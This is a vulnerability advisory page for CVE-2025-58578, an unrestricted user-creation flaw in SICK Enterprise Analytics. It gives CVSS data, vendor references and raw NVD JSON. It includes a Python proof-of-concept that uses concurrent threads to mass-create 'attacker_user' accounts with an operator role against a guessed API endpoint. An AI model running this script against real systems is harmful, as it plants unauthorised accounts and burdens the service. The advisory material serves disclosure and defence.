Security Vulnerability Report
中文
CVE-2025-58578 CVSS 3.8 LOW

CVE-2025-58578

Published: 2025-10-06 07:15:34
Last Modified: 2026-01-27 17:33:44
Source: [email protected]

Description

A user with the appropriate authorization can create any number of user accounts via an API endpoint using a POST request. There are no quotas, checking mechanisms or restrictions to limit the creation.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK相关产品 - 具体受影响版本请参考SICK PSIRT公告 sca-2025-0010 (https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58578 PoC - SICK API Unrestricted User Account Creation # This PoC demonstrates the exploitation of missing rate limiting on user creation API endpoint import requests import json import concurrent.futures import time # Target configuration TARGET_URL = "https://target-sick-device/api/users" # Adjust to actual API endpoint AUTH_TOKEN = "Bearer <legitimate_auth_token>" # Valid token with user creation privileges # Headers for authenticated API request headers = { "Authorization": AUTH_TOKEN, "Content-Type": "application/json" } def create_user(user_index): """ Send POST request to create a new user account. The vulnerability allows unlimited creation without rate limiting. """ payload = { "username": f"attacker_user_{user_index}", "password": "P@ssw0rd!2025", "role": "operator", "email": f"user{user_index}@attacker.com" } try: response = requests.post(TARGET_URL, headers=headers, json=payload, timeout=10) return { "index": user_index, "status_code": response.status_code, "response": response.text[:200] } except Exception as e: return {"index": user_index, "error": str(e)} def exploit_unlimited_creation(num_accounts=1000, max_workers=50): """ Exploit the missing rate limiting vulnerability by creating multiple user accounts concurrently. """ print(f"[*] Starting exploitation: creating {num_accounts} accounts") print(f"[*] Target: {TARGET_URL}") print(f"[*] Concurrency: {max_workers} threads") start_time = time.time() successful = 0 failed = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor: futures = [executor.submit(create_user, i) for i in range(num_accounts)] for future in concurrent.futures.as_completed(futures): result = future.result() if "status_code" in result and 200 <= result["status_code"] < 300: successful += 1 else: failed += 1 elapsed = time.time() - start_time print(f"\n[+] Exploitation completed in {elapsed:.2f} seconds") print(f"[+] Successful creations: {successful}") print(f"[-] Failed creations: {failed}") print(f"[+] Rate: {successful/elapsed:.2f} accounts/second") if __name__ == "__main__": # Demonstrate the vulnerability by creating a large number of accounts exploit_unlimited_creation(num_accounts=1000, max_workers=50)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58578", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:33.977", "lastModified": "2026-01-27T17:33:43.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A user with the appropriate authorization can create any number of user accounts via an API endpoint using a POST request. There are no quotas, checking mechanisms or restrictions to limit the creation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.